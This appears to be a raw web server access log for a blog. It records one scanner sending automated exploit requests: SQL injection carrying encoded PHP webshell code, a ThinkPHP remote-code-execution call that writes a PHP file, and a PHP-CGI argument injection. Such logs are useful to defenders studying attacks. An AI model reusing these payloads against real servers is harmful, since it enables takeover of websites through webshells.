143.92.40.202 - - [08/Dec/2024:15:57:09 +0100] "POST /index.php?s=captcha HTTP/1.1" 404 4382 "https://blog.fdik.org/index.php?s=captcha" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224" 143.92.40.202 - - [08/Dec/2024:15:57:09 +0100] "GET /ueckn.php HTTP/1.1" 404 565 "https://blog.fdik.org/ueckn.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2" 143.92.40.202 - - [08/Dec/2024:15:57:10 +0100] "POST /index.php?s=captcha HTTP/1.1" 404 565 "https://blog.fdik.org/index.php?s=captcha" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537. 36" 143.92.40.202 - - [08/Dec/2024:15:57:10 +0100] "GET /blgx.php HTTP/1.1" 404 565 "https://blog.fdik.org/blgx.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 143.92.40.202 - - [08/Dec/2024:15:57:11 +0100] "POST /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=ualzg.php&updateHost/ HTTP/1.1" 404 4382 "https://blog.fdik.org/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_ name=ualzg.php&updateHost/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 143.92.40.202 - - [08/Dec/2024:15:57:12 +0100] "POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1" 404 565 "https://blog.fdik.org/utility/convert/index.php?a=config&source=d7.2_x2.0" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 143.92.40.202 - - [08/Dec/2024:15:57:12 +0100] "POST /utility/convert/data/config.inc.php HTTP/1.1" 404 565 "https://blog.fdik.org/utility/convert/data/config.inc.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 143.92.40.202 - - [08/Dec/2024:15:57:13 +0100] "GET /user.php?act=login HTTP/1.1" 404 565 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:617:\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f6 46528275a6d6c735a56397764585266593239756447567564484d6f4a325632646d46734c6e426f634363734a7a772f6347687749474e7359584e7a49456468545445775a6b4531494873676348566962476c6a49475a31626d4e306157397549463966593239756333527964574e304b4352494e3231314e696c374945426c 646d46734b4349764b6c70484e587072626c4a6d553273714c7949754a456733625855324c6949694b547367665831755a5863675232464e4d54426d5154556f4a4639535256465652564e55577a45794d3130704f7a382b4d4456684d54466b4e6a5578596d4d785a5455324e6d4d305a5363702729293b2f2f7d787878,10 -- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 143.92.40.202 - - [08/Dec/2024:15:57:13 +0100] "GET /user.php?act=login HTTP/1.1" 404 565 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:617:\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f6 46528275a6d6c735a56397764585266593239756447567564484d6f4a325632646d46734c6e426f634363734a7a772f6347687749474e7359584e7a49456468545445775a6b4531494873676348566962476c6a49475a31626d4e306157397549463966593239756333527964574e304b4352494e3231314e696c374945426c 646d46734b4349764b6c70484e587072626c4a6d553273714c7949754a456733625855324c6949694b547367665831755a5863675232464e4d54426d5154556f4a4639535256465652564e55577a45794d3130704f7a382b4d4456684d54466b4e6a5578596d4d785a5455324e6d4d305a5363702729293b2f2f7d787878,10 -- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 143.92.40.202 - - [08/Dec/2024:15:57:13 +0100] "GET /index.php/api/Uploadify/preview HTTP/1.1" 404 565 "https://blog.fdik.org/index.php/api/Uploadify/preview" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 143.92.40.202 - - [08/Dec/2024:15:57:16 +0100] "GET /cpjtj.php HTTP/1.1" 404 565 "https://blog.fdik.org/cpjtj.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 143.92.40.202 - - [08/Dec/2024:15:57:16 +0100] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 404 565 "https://blog.fdik.org/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp: //input" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 143.92.40.202 - - [08/Dec/2024:15:57:16 +0100] "GET /index.php HTTP/1.1" 404 565 "^url^/index.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 143.92.40.202 - - [08/Dec/2024:15:57:17 +0100] "GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=rkwlm.php&vars[1][]=xinghuoxise$ HTTP/1.1" 301 1173 "http://blog.fdik.org/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put _contents&vars[1][]=rkwlm.php&vars[1][]=xinghuoxise$" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 143.92.40.202 - - [08/Dec/2024:15:57:18 +0100] "GET /rkwlm.php HTTP/1.1" 301 541 "http://blog.fdik.org/rkwlm.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"